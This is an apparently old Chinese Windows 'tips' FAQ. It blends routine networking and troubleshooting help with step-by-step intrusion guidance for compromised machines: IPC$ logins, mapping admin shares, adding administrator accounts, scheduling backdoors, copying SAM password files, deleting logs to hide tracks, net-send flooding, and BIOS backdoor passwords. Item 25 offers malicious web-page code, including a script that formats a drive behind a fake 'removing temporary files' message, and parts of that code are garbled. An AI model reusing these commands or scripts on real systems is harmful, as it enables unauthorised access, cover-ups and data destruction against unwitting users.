1)如何查看本機(jī)所開端口:
用netstat -a -n
LISTEN:偵聽來(lái)自遠(yuǎn)方的TCP端口的連接請(qǐng)求
SYN-SENT:再發(fā)送連接請(qǐng)求后等待匹配的連接請(qǐng)求
SYN-RECEIVED:再收到和發(fā)送一個(gè)連接請(qǐng)求后等待對(duì)方對(duì)連接請(qǐng)求的確認(rèn)
ESTABLISHED:代表一個(gè)打開的連接
FIN-WAIT-1:等待遠(yuǎn)程TCP連接中斷請(qǐng)求,或先前的連接中斷請(qǐng)求的確認(rèn)
FIN-WAIT-2:從遠(yuǎn)程TCP等待連接中斷請(qǐng)求
CLOSE-WAIT:等待從本地用戶發(fā)來(lái)的連接中斷請(qǐng)求
CLOSING:等待遠(yuǎn)程TCP對(duì)連接中斷的確認(rèn)
LAST-ACK:等待原來(lái)的發(fā)向遠(yuǎn)程TCP的連接中斷請(qǐng)求的確認(rèn)
TIME-WAIT:等待足夠的時(shí)間以確保遠(yuǎn)程TCP接收到連接中斷請(qǐng)求的確認(rèn)
CLOSED:沒有任何連接狀態(tài)
2)如何獲得一個(gè)IP地址的主機(jī)名
利用ping -a ip 命令查看!再第一行的pinging后面的『ip』前面的英文就是對(duì)方主機(jī)名!
同樣道理,利用ping machine_name也可以得到對(duì)方的ip
獲得一個(gè)網(wǎng)站的ip地址的方法是:ping www.***.com
如果返回:Reply from *.*.*.*: TTL expired in transit的話,代表TTL(生命周期)在傳輸過(guò)程中過(guò)期
3)如何查看本機(jī)的ip地址
用ipconfig/all來(lái)查看
4)再使用net命令的時(shí)候遇到一些錯(cuò)誤代碼,如何查看對(duì)應(yīng)的錯(cuò)誤信息?
用命令 net helpmsg erorr_code來(lái)查看
比如錯(cuò)誤代碼為:88
則查看命令為:net helpmsg 88 下面有這個(gè)錯(cuò)誤代碼的中文顯示!
5)利用telnet連接到對(duì)方主機(jī)上,想獲得一些系統(tǒng)信息,用什么命令?
set命令可以很好的完成你所需要收集信息的任務(wù)的!
方法:再cmd下直接輸入set(telnet對(duì)方主機(jī)以后,也是直接set就可以了)
computername:主機(jī)名!
OS=Windows_NT :操作系統(tǒng)的類型
path=C:/perl/bin/ :(perl的解釋器位置!)
systemDrive=c: 操作系統(tǒng)盤符!
USERNAME=coldcrysky 當(dāng)前登陸使用機(jī)器的用戶
(6)跟蹤路由器的命令是什么?
tracert 格式:tracert ip
中間會(huì)列出所有經(jīng)過(guò)的路由器列表!這些路由器如果是暴露再防火墻外面的話,還可以看到路由的IP(這里又涉及到了另外一個(gè)問題:為什么要把路由放在防火墻后面?原因呢,主要有兩點(diǎn):1)保護(hù)路由器!因?yàn)楝F(xiàn)在越來(lái)越多的攻擊和入侵已經(jīng)開始瞄準(zhǔn)路由器了;2)為路由器減少負(fù)擔(dān)!如果所有的過(guò)濾功能統(tǒng)統(tǒng)都?jí)涸诼酚善魃厦妫酚善鞯呢?fù)擔(dān)就太大了!)
7)簡(jiǎn)單介紹一下cookie!
作用:記錄訪問者的一些信息。例如利用cookie記錄你所登陸這個(gè)網(wǎng)頁(yè)的次數(shù)、登陸時(shí)曾經(jīng)輸入的信息……
大家在Administrator的cookies目錄中可以看到很多的記事本文檔吧?這些都是cookie,雖然經(jīng)過(guò)了加密,但是仔細(xì)查找的話,仍然能夠看到一些敏感信息!況且現(xiàn)在也已經(jīng)有了專門查看cookie的軟件!
那么,如何清除cookie呢?一般情況下,可以在Internet選項(xiàng)中的常規(guī)選項(xiàng)卡中看到一個(gè)刪除cookies的按鈕,點(diǎn)擊就可以清楚掉了~
除此以外,還要在internet選項(xiàng)中的內(nèi)容選項(xiàng)卡中找到自動(dòng)完成按鈕,把里面的四項(xiàng)都選中!然后點(diǎn)擊清除表單,清除密碼~
徹底禁止cookie的方法
a:在IE的Internet選項(xiàng)中,找到隱私選項(xiàng)卡!把里面的滑塊拖到最上面,邊上寫著:阻止所有cookie
b:找到Windows目錄下的cookies目錄!把里面的txt文件全部刪除!,最后應(yīng)該只剩下一個(gè)index.dat文件!之后把這個(gè)文件夾設(shè)置成只讀就可以了~
8)安裝2000的時(shí)候,速度會(huì)特別特別特別慢,怎么加快安裝速度呢?
在DOS上面安裝,應(yīng)該用98啟動(dòng)光盤來(lái)引導(dǎo)系統(tǒng)!然后按照下面的方法來(lái)做,可以提高安裝速度:
g:/>cd windows -------假設(shè)G為光驅(qū) windows為98的安裝目錄!
g:/windows>smartdrv -------加載smartdrv程序!加載后沒有任何提示信息!只要不返回錯(cuò)誤信息就是加載成功了~這時(shí)候安裝2K的話,速度會(huì)很快的哦~
9)Windows2K密碼忘記了,如何才能進(jìn)入系統(tǒng)?
Windows2K的用戶配置信息和密碼保存在SAM文件里!該文件位于:c:/winnt/system32/config目錄中!只要?jiǎng)h除這個(gè)文件就可以了~
另外,在c:/winnt/repair目錄中也同樣有一個(gè)SAM文件(這個(gè)是前者的備份!)如果你在登陸肉雞的時(shí)候,copy前面那個(gè)目錄中的SAM文件,你會(huì)發(fā)現(xiàn)COPY不下來(lái)!呵呵,為什么?因?yàn)檫\(yùn)行著的2K系統(tǒng)會(huì)保護(hù)SAM文件啊~這個(gè)時(shí)候你就COPY這個(gè)就可以了!
10)ping不到,tracert不到,但是卻能用nbtstat顯示對(duì)方的一些信息,為什么?
因?yàn)閠racert和ping命令使用的是ICMP協(xié)議!而nbtstat是通過(guò)對(duì)方的netbios端口來(lái)獲得對(duì)方的主機(jī)信息的!使用的是UDP和TCP協(xié)議!如果對(duì)方僅僅只對(duì)ICMP協(xié)議做了禁止的話,那通過(guò)這個(gè)命令獲得系統(tǒng)信息是正常的!
11)telnet上去后,如何給對(duì)方開共享?
開共享的命令如下:net share c=c:/winnt/system 返回共享成功之后直接利用//ip/c來(lái)訪問對(duì)方的system目錄了~刪除共享用 share c /del 命令就可以了
12)如何判斷對(duì)方的具體操作系統(tǒng)版本?
首先用ver命令查看對(duì)方的版本號(hào)!
如果是5.00.2195的話,為2K;5.1.2600為XP
從這里可以區(qū)分出來(lái)到底是2K還是XP了~下面進(jìn)行更加具體的區(qū)分!
2K的pro和svr版本區(qū)分:
在telnet下,net shart查看啟動(dòng)的服務(wù)~如果對(duì)方開啟了Terminal Services服務(wù)的話,基本上可以判斷為svr以上的版本了~如果沒有開啟,則為pro!
XP的pro和home版的區(qū)分:
home edition是無(wú)法安裝iis的!所以,可以通過(guò)iis服務(wù)來(lái)判斷到底是home版或者是pro了~
當(dāng)然了,如果對(duì)方是pro,但是將iis刪除(停用)的話,就沒辦法判斷了
13)如何查看98的隨機(jī)啟動(dòng)的程序?
在98下有一個(gè)實(shí)用配置程序(msconfig),中文名為:系統(tǒng)配置實(shí)用程序,調(diào)用的方法是在:開始--運(yùn)行中輸入msconfig,在里面,有一個(gè)啟動(dòng)的選項(xiàng)卡,點(diǎn)擊后,可以看到很多隨即啟動(dòng)程序,如果前面帶有鉤的話,就是啟動(dòng)時(shí)隨機(jī)啟動(dòng)的,取消的話就是把前面的小鉤去掉就可以了~除了這里以外,還有config.sys、autoexec.bat、system.ini、win.ini幾個(gè)選項(xiàng)卡,他們分別對(duì)應(yīng)這幾個(gè)文件!只不過(guò)在這里更方便查看而已!
14)設(shè)置了BIOS密碼,可是卻忘記了,該怎么辦?
如果是可以進(jìn)入Windows的話,可以找找biospwds和cmospwd這兩個(gè)軟件看看~
還有利用DEBUG法:
簡(jiǎn)單介紹兩種:
1)-o 70 16
-o 71 13
-q
2)-o 70 16
-o 71 16
-q
另一種方法:copy法:
copy con cmos.com
輸入下面10個(gè)字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回車,退出,運(yùn)行這個(gè)cmos.com程序就可以了~
如果不能進(jìn)入Windows怎么辦呢?
1)用通用密碼:
Award Bios密碼:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密碼:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
2)可以利用CMOS放電
15)如何再命令行下殺死對(duì)方進(jìn)程?
利用微軟的2K以上操作系統(tǒng)都是含有這個(gè)工具的!該工具包含在2K光盤的/support/tools文件夾下!里面有安裝程序,點(diǎn)擊后,就安裝了2K的support tools工具包,里面有kill這個(gè)工具,這時(shí)候再cmd下可以輸入kill/?,就可以看到幫助了,使用這個(gè)命令的格式是:kill pid (pid是進(jìn)程的ID號(hào)!)再任務(wù)管理器中可以看到進(jìn)程的ID號(hào)
那再命令行下如何查看進(jìn)程呢?呵呵,這就用到了系統(tǒng)自帶的有一個(gè)后門工具了:再剛才說(shuō)得那個(gè)目錄中,還有一個(gè)工具叫tlist !直接輸入tlist就可以得到pid遇隊(duì)形程序的列表了~
16)如何查看本機(jī)的DNS服務(wù)器?
ipconfig其實(shí)是可以的,還可以利用一個(gè)命令:再cmd下輸入netsh,進(jìn)入到netsh>提示符,再輸入:int ip 進(jìn)入到interface ip> 然后再次輸入dump,這時(shí)候屏幕上出現(xiàn)當(dāng)前連接的配置情況了
1)查看本機(jī)IP:首先鍵入netsh,再netsh>提示符下輸入:interface 回車 之后:ip 回車 再之后:show address 回車 這樣,就可以看到當(dāng)前連接的IP地址和子網(wǎng)掩碼。
2)修改網(wǎng)絡(luò)配置:接著上面的命令,我們使用:set address name=“本地連接” source=static addr=192.168.0.200 mask=255.255.255.0,這樣就修改了當(dāng)前的IP地址,用show address來(lái)看
3)顯示一個(gè)完整的網(wǎng)絡(luò)配置教本:
剛才說(shuō)過(guò),第一個(gè)命令顯示的信息不如ipconfig/all全面,不用著急,netsh再打印顯示網(wǎng)絡(luò)配置上,還是有自己的特色的!例如:再interface ip>狀態(tài)下輸入:dump,會(huì)顯示一個(gè)清單,顯示所有本地連接(不管你是否使用~)與netstat -an不完全一樣!
17)肉雞上的部分文件無(wú)法刪除,怎么辦?
如果對(duì)方的文件夾是只讀的話,會(huì)出現(xiàn)拒絕訪問的字樣!這時(shí)候,我們可以再del命令后面加上/f參數(shù)來(lái)刪除!
18)再說(shuō)一個(gè)可以限制用戶登陸時(shí)間的命令!
再net命令中就可以實(shí)現(xiàn)這樣的功能!具體方法如下:
假如我們打算讓:coldcrysky這個(gè)用戶再周日到周易的上午八點(diǎn)到下午四點(diǎn)之間可以登陸,用這個(gè)命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之后利用net user coldcrysky命令來(lái)查看登陸時(shí)間的限制,可以看到是我們所規(guī)定的時(shí)間
在此,特別提醒各位:命令中:星期日才是一周的開始!!!不要當(dāng)成星期一!
如果想恢復(fù)回去:net user coldcrysky /time:all --這樣就可以了~
19)如何刪除windows2K的默認(rèn)共享?
首先打開記事本,輸入如下內(nèi)容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
之后點(diǎn)擊保存成批處理文件(后綴為:bat的文件!)!加入到啟動(dòng)組中就可以了~
20)139端口的又一用法
1:Net use //XXX.XXX.XXX.XXX/ipc$ "password" /user:"username" 建立一個(gè)IPC連接
2:net use H: //XXX.XXX.XXX.XXX/C$ 將對(duì)方的C盤映射為自己的h盤
3:copy c on h:/reboot.bat
Iisreset /reboot
CTRL+Z
在對(duì)方的C盤上生成一個(gè)能重啟機(jī)器的文件
4:net time //XXX.XXX.XXX.XXX 得到對(duì)方機(jī)器時(shí)間
5:at //XXX.XXX.XXX.XXX 重啟的時(shí)間 c:/reboot.bat 設(shè)定對(duì)方重啟的時(shí)間!
6:at //XXX.XXX.XXX.XXX 查看任務(wù)上面是否添加了這個(gè)任務(wù)
7:等對(duì)方重啟好了~
21)利用批處理文件來(lái)建立一個(gè)記錄3389登陸者信息的記錄器
由于Terminal Service默認(rèn)是沒有日志記錄的,只能依靠他的系統(tǒng)日志,但是系統(tǒng)日志只能記錄一些大動(dòng)作(開啟或停止服務(wù)),那么,如何用批處理文件來(lái)編寫一個(gè)將是3389端口的程序呢?很簡(jiǎn)單:
建立一個(gè)批處理文件:內(nèi)容如下:
@echo off
date/t >> c:/3389log.txt
:TS3389
time/t >> c:/3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:/3389log.txt
goto :TS3389
之后保存!
22)網(wǎng)絡(luò)命令小節(jié)
A、NET命令:
IPC連接:格式 net use //對(duì)方IP/ipc$ "密碼" user:"用戶名" 『建立IPC連接~』
net use //對(duì)方IP/ipc$ /delete 『斷開連接~』
以下操作需要在連接到對(duì)方主機(jī)后才可進(jìn)行!!!
net user coldcrysky xyz /add 『在連接的目標(biāo)主機(jī)中加入一個(gè)用戶名為COLDCRYSKY 密碼為WYZ的用戶』
net localgroup Administrator coldcrysky /add 『把名為coldcrysky的用戶加入ADMIN組-以為著權(quán)限的提高』
net use z://對(duì)方IP/C$ 『把對(duì)方的C盤映射為本機(jī)的Z盤-可依照需要更改映射盤符!』
net start telnet 『開啟TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密碼改為COLDCRYSKY』
B、AT命令:
查看遠(yuǎn)程機(jī)時(shí)間:net time //對(duì)方IP
加入一項(xiàng)新任務(wù):
at //對(duì)方IP 時(shí)間 文件名 『用來(lái)把自己上傳的后門程序在制定時(shí)間運(yùn)行,方便以后進(jìn)入肉雞!』
C、TELNET命令:
telnet 對(duì)方IP 端口 『作用不用我說(shuō)了吧???』
D、FTP命令:
登陸:ftp 對(duì)方網(wǎng)址(IP地址)
上傳文件:get 文件在本機(jī)完整路徑 對(duì)方文件存放完整路徑
下載文件:put 對(duì)方文件完整路徑 本機(jī)存放文件路徑
E、COPY命令:
在建立連接后(尤其是IPC$連接后,很有用的命令哦~)
⑴copy index.htm //127.0.0.1/c$/index.htm
『將本機(jī)index.htm文件復(fù)制到127.0.0.1的C盤下,如果要放到對(duì)方的NT目錄下,則把C改為admin$』
⑵copy //127.0.0.1/admin/repair/sam_ c: 『將遠(yuǎn)程機(jī)數(shù)據(jù)庫(kù)文件拷貝到本機(jī)C盤根目錄下』F、SET命令:
主要用于分析目標(biāo)計(jì)算機(jī)的基本信息用!具體使用方法請(qǐng)查找相關(guān)文件!
G、NBTSTAT命令:
nbtstat -A 對(duì)方IP (這個(gè)A大寫)
『在其中顯示<037>前面的英文或數(shù)字就是計(jì)算機(jī)名稱!當(dāng)然,也可以利用PING -A 對(duì)方ip的方法來(lái)查看對(duì)方主機(jī)名!效果相同!!!』
H、SHUTDOWN命令:
『用來(lái)關(guān)閉對(duì)方NT服務(wù)的命令』格式如下:
shutdown //IP地址 t:20
『20秒后自動(dòng)關(guān)閉對(duì)方NT服務(wù)!由于對(duì)對(duì)方機(jī)器影響較大,慎用!!!』
I、DIR命令:
還用我說(shuō)么?大家是不是早就該掌握了???(不知道的還是查閱相關(guān)資料吧~~~)
J、ECHO命令:
echo coldcrysky >index.htm 『用coldcrysky覆蓋掉原INDEX.HTM中所有內(nèi)容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文件屬性用,格式:
Attrib -r index.htm 『去掉只讀屬性』(+- 分別代表增加和減少)
L、DEL命令:
『刪除日志的時(shí)候用!』
del c:/winnt/system32/logfiles/*.*
del c:/winnt/system32/config/*.evt
del c:/winnt/system32/dtclog/*.*
del c:/winnt/system32/*.log
del c:/winnt/system32/*.txt
del c:/winnt/*.txt
del c:/winnt/*.log
M、PING命令:
-t :ping制定IP,知道網(wǎng)絡(luò)斷開或按CTRL+C結(jié)束!
-a :解釋PING IP的主機(jī)名
-n count :發(fā)送count指定的ECHO數(shù)據(jù)包,默認(rèn)為4個(gè)!
23)開啟服務(wù)和停止服務(wù)的net start and net stop
net start和net stop到底能開啟什么服務(wù)?其實(shí)這點(diǎn)也不需要你強(qiáng)記,記住這個(gè)命令就可以了:net help start和net help stop,這兩個(gè)會(huì)顯示出你所能開啟的服務(wù)有那些~~
24)關(guān)于雙系統(tǒng)的兩個(gè)問題:
A、如何在雙系統(tǒng)(98、2000)中安全刪除2K?
先制作一張Windows 98 的啟動(dòng)軟盤,再用它啟動(dòng)你的計(jì)算機(jī),運(yùn)行sys命令恢復(fù)Windows 98引導(dǎo)記錄后,再運(yùn)行fdisk/mbr恢復(fù)主引導(dǎo)記錄,完成后進(jìn)入Windows 98,把winnt 和system volumn information 目錄刪除,再刪掉C盤上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。
B、 Windows 98/XP雙系統(tǒng)啟動(dòng)菜單修復(fù)
1.修復(fù)前,在BIOS中設(shè)置從光驅(qū)啟動(dòng)。用Windows XP安裝盤啟動(dòng)電腦,在加載必要的驅(qū)動(dòng)后,出現(xiàn)Windows XP的安裝界面。有三個(gè)選項(xiàng):
(1)要現(xiàn)在開始安裝Windows XP,請(qǐng)按“Enter”鍵。
(2)要用“恢復(fù)控制臺(tái)”修復(fù)Windows XP安裝,按“R”鍵。
(3)要退出安裝程序,不安裝Windows XP,按“F3”鍵;
2. 按“R”鍵,進(jìn)入“Microsoft Windows XP (TM) 故障恢復(fù)控制臺(tái)”界面;故障恢復(fù)控制臺(tái)提供系統(tǒng)修復(fù)和故障恢復(fù)功能。系統(tǒng)這時(shí)會(huì)搜尋已安裝的Windows XP系統(tǒng)文件,然后顯示搜尋結(jié)果,并詢問“要登錄到哪個(gè)Windows XP安裝(要取消,請(qǐng)按Enter)”,選擇1. D:/Windows,回車,系統(tǒng)會(huì)再詢問“管理員密碼”,再鍵入安裝Windows XP時(shí)設(shè)置的管理員密碼,回車,出現(xiàn)D:/Windows〉,這時(shí)需要輸入修復(fù)命令Fixboot,后面的參數(shù)為啟動(dòng)扇區(qū)要寫入的磁盤盤符,這里填入C:,回車。修復(fù)完成,鍵入Exit退出。重啟后就會(huì)看到久違的雙重啟動(dòng)菜單了。并且,這樣修復(fù)后基本不產(chǎn)生垃圾文件。
25)這里說(shuō)幾個(gè)主頁(yè)惡意代碼
A、死循環(huán)代碼:
『把下列代碼加入到網(wǎng)頁(yè)中,可達(dá)到如上效果』
說(shuō)明:當(dāng)含有這段代碼的網(wǎng)頁(yè)被人點(diǎn)擊,連接就會(huì)不斷的打開IE瀏覽器,直到你的系統(tǒng)資源浪費(fèi)到0%~只有重新啟動(dòng)才能正常使用!
預(yù)防方法:禁用所有的ActiveX控件和插件!因?yàn)檫@是一個(gè)ActiveX教本程序~
B、恐怖的大圖片:
『把下列代碼加入到網(wǎng)頁(yè)中,可達(dá)到如上效果』
說(shuō)明:當(dāng)打開這樣的網(wǎng)頁(yè),IE會(huì)不斷的解釋試圖打開,但由于圖片實(shí)在太大,超出了其處理能力,所以
C、地震死機(jī)代碼:
『把下列代碼加入到網(wǎng)頁(yè)中,可達(dá)到如上效果』
說(shuō)明:
WINDOWS9x的/con/con設(shè)備名稱解析漏洞允許用戶進(jìn)行攻擊,倒是98死機(jī)。原理:我們知道,CON是DOS下的特殊設(shè)備名,不允許做文件名,如果我們?cè)贒OS下鍵入如下命令:copy coldcrysky.txt con,系統(tǒng)會(huì)顯示coldcrysky.txt的內(nèi)容,如果換成:copy coldcrysky.txt>con系統(tǒng)會(huì)提示文件不能拷貝到文件自身。如果吧con換成LPT或PRN,則輸出coldcrysky.txt到打印機(jī)。由此可見,CON代表文件本身,如果使用/CON/CON命令,則意味著系統(tǒng)不斷調(diào)用文件本身,視系統(tǒng)資源迅速枯竭,連按CTRL+ALT+DEL的機(jī)會(huì)都沒有~
解決辦法:
對(duì)于9X系統(tǒng),強(qiáng)烈建議打補(bǔ)丁!!!2000和XP則不會(huì)死機(jī)~
D、格式化硬盤:(最恐怖的~~~慎用!!!請(qǐng)勿用于非法用途!!!使用后如果有任何負(fù)作用,后果自負(fù)!與傷寒天空『ColdCrySky』;亂刀留影無(wú)關(guān)!!!)
scr,Reset();
scr.Path="C://WINDOWS//StartMenu//Programs//啟動(dòng)//startup.htm";
scr.Doc="
"
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();
說(shuō)明:當(dāng)您瀏覽了網(wǎng)頁(yè),會(huì)把startup.hta文件寫入啟動(dòng)文件夾,并提示W(wǎng)INDOWS正在刪除臨時(shí)文件!實(shí)際上是在格式化你的D盤,代碼中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對(duì)應(yīng)為:Windows Scripting Host Shell Object。代碼中的:WSH全稱是:Windows Scripting Host,是微軟的一種基于32位系統(tǒng)平臺(tái)與語(yǔ)言無(wú)關(guān)的教本解釋機(jī)制,它使得腳本能在WINDOWS桌面或命令提示符下運(yùn)行~WSH所對(duì)應(yīng)的程序WScript.exe是一個(gè)腳本語(yǔ)言解釋器,位于WINDOWS所在文件夾下,所以它可以像執(zhí)行批處理文件一樣執(zhí)行WSH腳本程序~
解決方法:1)更新您的瀏覽器,使用最新的瀏覽器上網(wǎng)!
2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用啟動(dòng)菜單。
3)吧format.com改名
4)禁用WSH。具體方法:在win98中,從添加刪除程序中點(diǎn)擊WINDOWS安裝程序,打開附件一項(xiàng),將WINDOWS SCRIPTING HOST前面的選項(xiàng)去掉,就可以卸載掉WSH了~~~win2000和xp的用戶可以在我的電腦-工具菜單-文件夾選項(xiàng)-選擇文件類型,找到VBS VBSCRIPT FILE選項(xiàng),點(diǎn)擊刪除!
26)系統(tǒng)自帶的系統(tǒng)工具
1、msinfo32.exe
位于C:/Program Files/Common Files
Microsoft Shared/Msinfo/msinfo32.exe,顯示計(jì)算機(jī)中的有關(guān)系統(tǒng)信息,可用其診斷、解決計(jì)算機(jī)問題并查看遠(yuǎn)程系統(tǒng)所生成的系統(tǒng)報(bào)告。
2、drwatson.exe --
位于C: /Windows /drwatson.exe,當(dāng)某個(gè)應(yīng)用程序在運(yùn)行過(guò)程中出錯(cuò)時(shí),它就會(huì)將出錯(cuò)的程序以及出錯(cuò)的內(nèi)存地址一一記錄下來(lái),并保存為Windows的Drwatson子目錄下的*.wlg記錄文件。
3、sfc.exe
位于C:/Windows/System/sfc.exe,用于自動(dòng)搜索被改變、刪除或損壞了的系統(tǒng)文件。
4、msconfig.exe
位于C:/Windows/System/msconfig.exe,通過(guò)修改啟動(dòng)方式以及啟動(dòng)時(shí)運(yùn)行哪些應(yīng)用程序等系統(tǒng)配置,從而達(dá)到快速排除故障的目的。
5、scanreg.exe
位于C:/windows/command/scanreg.exe(DOS版本)及C:/windows/scanregw.exe(Windows版本),用于檢查、修復(fù)、備份以及還原系統(tǒng)注冊(cè)表及相關(guān)配置文件的工具軟件,防止因注冊(cè)表數(shù)據(jù)被破壞而導(dǎo)致的系統(tǒng)故障。
6、vcmui.exe
位于C:/Windows/vcmui.exe,在后臺(tái)自動(dòng)將被覆蓋的驅(qū)動(dòng)程序備份下來(lái),當(dāng)我們安裝的新驅(qū)動(dòng)出錯(cuò)時(shí)可用它進(jìn)行恢復(fù)。
7、winrep.exe
位于C:/Windows/winrep.exe,能自動(dòng)收集有關(guān)系統(tǒng)信息并提示用戶輸入故障所在,幫我們編寫一篇完整的“求援”報(bào)告,并將其發(fā)送給有關(guān)技術(shù)維護(hù)人員,簡(jiǎn)化“求援”操作。
這七個(gè)Windows自帶的小程序可以在開始菜單--運(yùn)行中直接輸入文件名(無(wú)需輸入擴(kuò)展名)調(diào)出該程序!
27)批處理在入侵中的幾則妙用!
A、簡(jiǎn)化IPC$登陸肉雞的操作:
用記事本建立一個(gè)名字為:ipcruqin.bat的批處理文件,內(nèi)容如下:
@net use //%1/ipc$ %3 /u:"%2"
@echo OK!已經(jīng)成功建立連接
之后,大家在CMD下輸入:ipcruqin.bat 肉雞IP 肉雞的admin帳號(hào)/用戶的密碼。就可以登陸上去了,而不需要那一大長(zhǎng)串的命令了!
B、批處理轟炸對(duì)方電腦:
打開一記事本,在里面輸入如下內(nèi)容:
@echo 正在轟炸中……
tart
@net send %1 %2
@if errorlevel 1 goto over
goto start
ver
@echo 發(fā)送失敗
將其保存為bat格式的文件即可,使用方法:*.bat(該批處理文件的名字)+ 空格 + 目標(biāo)IP + 空格 + 你要對(duì)他說(shuō)得話!
這次先簡(jiǎn)單介紹這三個(gè)!等下次有機(jī)會(huì)再給大家介紹更多的批處理文件的用途!
28)再說(shuō)幾個(gè)非常簡(jiǎn)單實(shí)用的DOS命令(工具):
A、fport.exe --查看那些端口都是那些程序使用的命令。
B、netstat -an --查看那些端口于外部的IP連接。比如這里顯示 :23 XX.XX.XX.XX 而你又沒有開23端口,那么,呵呵……還用我說(shuō)么?
C、letmain.exe //ip -admin -d --列出本機(jī)的administrators組的用戶名查看是否有異常。
D、pslist.exe --列出進(jìn)程
E、pskill.exe --殺掉進(jìn)程,有時(shí)候再任務(wù)管理器中無(wú)法終止程序,那就用這個(gè)工具來(lái)停止進(jìn)程。
F、login.exe --列出當(dāng)前有那些用戶登陸再你的機(jī)器上。
局域網(wǎng)應(yīng)用問題專題解答
問:在由三臺(tái)電腦組成的局域網(wǎng)中,我在其中一臺(tái)電腦上用過(guò)Windows優(yōu)化大師后,為什么這臺(tái)電腦就不能登錄網(wǎng)絡(luò),并且還提示找不到撥號(hào)適配器?
答:根據(jù)你說(shuō)的情況,是沒有安裝“撥號(hào)網(wǎng)絡(luò)”。解決方法是:在“控制面板”的“添加/刪除程序”中,選擇“Windows安裝程序”,在“組件”的“通訊”中選擇“撥號(hào)網(wǎng)絡(luò)”,然后將Windows安裝盤放入光驅(qū)進(jìn)行安裝,重新啟動(dòng)計(jì)算機(jī)后就可使用撥號(hào)網(wǎng)絡(luò)了。
我新購(gòu)的網(wǎng)卡在電腦上無(wú)法安裝,而在其他電腦上卻使用正常,這是怎么回事?
答:如果在電腦中安裝好網(wǎng)卡后,系統(tǒng)沒有提示找到新硬件,你可運(yùn)行“添加新硬件向?qū)А眮?lái)讓系統(tǒng)搜索新硬件。方法是單擊“開始”,指向“設(shè)置”,單擊“控制面板”,然后再雙擊“添加新硬件”。按照屏幕提示操作。你可選“讓W(xué)indows搜索新硬件嗎?”,單擊“是(推薦)”,然后再單擊“下一步”,讓系統(tǒng)找到網(wǎng)卡再安裝其驅(qū)動(dòng)。
而如果出現(xiàn)以下任何現(xiàn)象,網(wǎng)卡或者網(wǎng)卡所在的插槽損壞:
1、“添加新硬件向?qū)А睓z測(cè)不到網(wǎng)卡;
2、“添加新硬件向?qū)А蹦軌驒z測(cè)到網(wǎng)卡,但無(wú)法正常工作。
為了確定到底是網(wǎng)卡還是插槽的問題,可以檢查網(wǎng)卡是否牢靠插入插槽之中。如果網(wǎng)卡已牢靠插入插槽之中,請(qǐng)改插到其他插槽之中試試。如果問題仍未解決,則可能是網(wǎng)卡損壞或與你的電腦不兼容,可更換之。
我的電腦出現(xiàn)“網(wǎng)上鄰居”中找不到其他聯(lián)網(wǎng)電腦的故障,如何解決?
答:“網(wǎng)上鄰居”是按工作組顯示計(jì)算機(jī)的。如果你的電腦沒有設(shè)置工作組名稱,打開“網(wǎng)上鄰居”時(shí)就可能看不到其他電腦。單擊“開始”,指向“設(shè)置”,單擊“控制面板”,雙擊“網(wǎng)絡(luò)”,然后再單擊“標(biāo)識(shí)”選項(xiàng)卡。你局域網(wǎng)中所有電腦“工作組”框中的名稱應(yīng)為一樣,如有不同你可在此框中鍵入相同的工作組名稱,然后單擊“確定”重啟電腦既可。
此外,如果“網(wǎng)上鄰居”中不出現(xiàn)“整個(gè)網(wǎng)絡(luò)”圖標(biāo),可能是在Windows中沒有安裝必要的網(wǎng)絡(luò)組件。要與網(wǎng)絡(luò)上的其他計(jì)算機(jī)連接,則必須安裝以下組件:Microsoft網(wǎng)絡(luò)客戶、網(wǎng)絡(luò)適配器、至少一種網(wǎng)絡(luò)協(xié)議(如IPX/SPX、TCP/IP等)。可打開“網(wǎng)絡(luò)”,檢查“配置”選項(xiàng)卡上的列表,確保已安裝了各種必要的網(wǎng)絡(luò)組件。如有,你可重新安裝各種缺少的組件即可。
問:辦公室機(jī)器桌面的“網(wǎng)上鄰居”圖標(biāo)沒了,能上Internet,但無(wú)法瀏覽其他機(jī)器上的資源了,怎么辦?
答:說(shuō)明你的Internet屬性完好,但網(wǎng)上鄰居屬性中的“Microsoft 網(wǎng)絡(luò)用戶”這一客戶組件沒了。
進(jìn)到“控制面板”中雙擊“網(wǎng)絡(luò)”,先在彈出的網(wǎng)絡(luò)對(duì)話框中點(diǎn)按“添加”按鈕,再?gòu)碾S后彈出的“請(qǐng)選擇網(wǎng)絡(luò)組件類型”對(duì)話框中雙擊“客戶”,最后從隨后的“選擇網(wǎng)絡(luò)客戶機(jī)”對(duì)話框的左側(cè)選擇“Microsoft”后再選擇“Microsoft 網(wǎng)絡(luò)用戶”,“確定”再“確定”并據(jù)提示重啟計(jì)算機(jī)就ok啦!
問:右鍵中的“共享”命令已經(jīng)顯身!但我設(shè)了共享不想讓別人從網(wǎng)上鄰居中看到這個(gè)共享目錄,只有自己知道且能實(shí)現(xiàn)異地機(jī)上有完全操作的權(quán)限。
答:找到你想要共享的文件夾并右鍵點(diǎn)選“共享…”----這里我就以共享“D:/Windows 98”為例,先選中“共享為”后在共享名“Windows 98(當(dāng)然也可改名共享哦)”后加一英文狀態(tài)的“$”符,再選中“完全”并輸入設(shè)定好“密碼”,然后“確定”一次密碼就OK了。
